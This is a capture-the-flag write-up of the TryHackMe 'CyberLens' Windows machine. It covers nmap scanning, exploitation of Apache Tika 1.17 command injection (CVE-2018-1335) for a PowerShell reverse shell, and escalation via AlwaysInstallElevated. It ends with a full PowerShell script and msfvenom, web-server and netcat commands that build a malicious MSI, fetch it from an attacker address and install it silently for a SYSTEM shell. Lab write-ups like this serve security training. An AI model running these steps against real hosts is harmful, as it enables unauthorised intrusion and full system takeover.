#tryhackme #windows #easy

![[Pasted image 20250716230908.png]]

# Information Gathering - Nmap

As always, I started off with a TCP SYN scan against all 65,535 ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 21:00 CDT
Nmap scan report for 10.10.20.237
Host is up (0.13s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49676/tcp open  unknown
61777/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds
```

Then I ran a second TCP scan, with default scripts and version detection, against the open ports for more detailed information.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 80,135,139,445,3389,5985,7680,47001,49664-49676,61777
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 21:02 CDT
Nmap scan report for cyberlens.thm (10.10.20.237)
Host is up (0.13s latency).

PORT      STATE  SERVICE       VERSION
80/tcp    open   http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-07-17T02:03:37+00:00; -1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-17T02:03:29+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2025-07-16T01:58:45
|_Not valid after:  2026-01-15T01:58:45
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open   pando-pub?
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   msrpc         Microsoft Windows RPC
49671/tcp closed unknown
49672/tcp closed unknown
49673/tcp closed unknown
49674/tcp closed unknown
49675/tcp closed unknown
49676/tcp open   msrpc         Microsoft Windows RPC
61777/tcp open   http          Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
|_http-title: Welcome to the Apache Tika 1.17 Server
| http-methods:
|_  Potentially risky methods: PUT
|_http-cors: HEAD GET
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-07-17T02:03:29
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.37 seconds
```

Three things stand out here: `rdp-ntlm-info` leaks the OS build (`10.0.17763`, i.e. Windows 10 1809 / Server 2019) and confirms the host is a standalone machine called `CYBERLENS`, SMB signing is enabled but not required, and port 61777 is serving an `Apache Tika 1.17 Server` on Jetty that accepts `PUT`.

Lastly, a UDP scan against the top 10 UDP ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 21:05 CDT
Nmap scan report for cyberlens.thm (10.10.20.237)
Host is up (0.13s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   open|filtered dhcps
123/udp  open|filtered ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 1.51 seconds
```

`open|filtered` only means no reply came back within the (very short) scan window; at this rate the UDP results are inconclusive rather than evidence of listening services, so nothing here changes the plan.

---

# Enumeration

##### Port 80 - HTTP

I opened my browser, typed in the IP address, and navigated to the website below.

![[Pasted image 20250716210854.png]]

##### Port 61777 - HTTP

Then I navigated to the service on port 61777. Its landing page confirms the name and version of the running server that nmap already reported: `Apache Tika 1.17 Server`

![[Pasted image 20250716211945.png]]

# Exploit - Initial Access

The `searchsploit` database shows a known vulnerability for this version: `CVE-2018-1335`. It is a command-injection flaw in `tika-server` (Apache Tika 1.7 through 1.17): the value of a crafted request header ends up on the command line of a process the server spawns on its host.

![[Pasted image 20250716212101.png]]

I executed the exploit code with the correct arguments but nothing happened. I also tried tweaking the argument values, with the same result.

![[Pasted image 20250716220201.png]]

The exploit is evidently blind: it returns nothing from the injected command, so "nothing happened" on my side was not proof that it had failed. To confirm whether it was actually executing my commands, I set up `tcpdump` to listen for ICMP packets, then had the target ping my own machine, and I captured the ICMP echo requests.

![[Pasted image 20250716220922.png]]

The target pinged my machine, so command execution was definitely happening. Now I wanted a proper reverse shell. I injected a base64-encoded PowerShell payload (`powershell -enc ...`), which avoids quoting and special-character problems at the injection point... and I got in!
![[Pasted image 20250716221939.png]]

Found `user.txt` in `C:\Users\CyberLens\Desktop`.

![[Pasted image 20250716230643.png]]

# Privilege Escalation

I found the `AlwaysInstallElevated` misconfiguration on this machine.

- Windows has a policy setting that determines whether the Windows Installer service runs `.msi` packages with the invoking user's privileges or with `SYSTEM` privileges.
- If the policy is misconfigured, any user, even a low-privileged one, can install an `.msi` package with `SYSTEM` privileges, and an installer package can run arbitrary code during installation.
- Specifically, the system is vulnerable only if `AlwaysInstallElevated` is set to `1` under `SOFTWARE\Policies\Microsoft\Windows\Installer` in both the `HKLM` (Local Machine) and `HKCU` (Current User) hives. With just one of the two set, the install is not elevated.

![[Pasted image 20250716222910.png]]

Let's make a malicious `.msi` payload on the local Kali machine and transfer it to the vulnerable Windows target.

![[Pasted image 20250716230325.png]]

The payload has been successfully transferred.

![[Pasted image 20250716230407.png]]

I ran `revshell.msi` and received a reverse shell connection back on my Kali machine on port 2222 again, but this time as `nt authority\system` :)

![[Pasted image 20250716230507.png]]

Found `admin.txt` in `C:\Users\Administrator\Desktop`.

![[Pasted image 20250716230544.png]]
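Going back to the `AlwaysInstallElevated` step: the check and the install, run from the low-privileged foothold shell, as an added PowerShell example (these are not the write-up's own commands, which only appear in the screenshots). The registry paths are the documented policy locations; the package name `revshell.msi` and listener port `2222` follow the write-up; the attacker address `10.8.0.1` and the use of `msfvenom` plus a Python web server on the Kali side are assumptions.

```powershell
# Added example, not the write-up's own commands. Verifies the AlwaysInstallElevated
# condition in BOTH hives before bothering with an MSI, then installs the package.
# The attacker IP below is an assumption; the MSI name and port follow the write-up.
function Test-AlwaysInstallElevated {
    # Same keys that `reg query HK(LM|CU)\SOFTWARE\Policies\Microsoft\Windows\Installer
    # /v AlwaysInstallElevated` reads from cmd.exe.
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $results = foreach ($k in $keys) {
        # A missing key or value means "not set", not an error, so suppress the exception.
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{ Key = $k; Value = $v.AlwaysInstallElevated }
    }
    $results | Format-Table -AutoSize | Out-String | Write-Host
    # Both hives must be 1. One hive alone does NOT elevate the install.
    return (@($results | Where-Object { $_.Value -eq 1 }).Count -eq 2)
}

if (-not (Test-AlwaysInstallElevated)) {
    Write-Warning 'AlwaysInstallElevated is not 1 in both hives; this vector does not apply.'
    return
}

# Attacker side (assumed IP), run beforehand on Kali:
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.1 LPORT=2222 -f msi -o revshell.msi
#   python3 -m http.server 80
#   nc -lvnp 2222
$AttackerIP = '10.8.0.1'
$msi = Join-Path $env:TEMP 'revshell.msi'
Invoke-WebRequest -Uri "http://$AttackerIP/revshell.msi" -OutFile $msi

# /quiet /qn: no UI, so nothing waits for a click. The Windows Installer service, not
# this shell, executes the package, which is why the resulting shell is SYSTEM.
Start-Process msiexec.exe -ArgumentList "/quiet /qn /i `"$msi`""
```

The check matters on real engagements more than on a lab box: a single hive set to `1` (a common half-applied GPO) looks promising in a `reg query` but the install runs as the current user, so confirm both values before generating and transferring a payload.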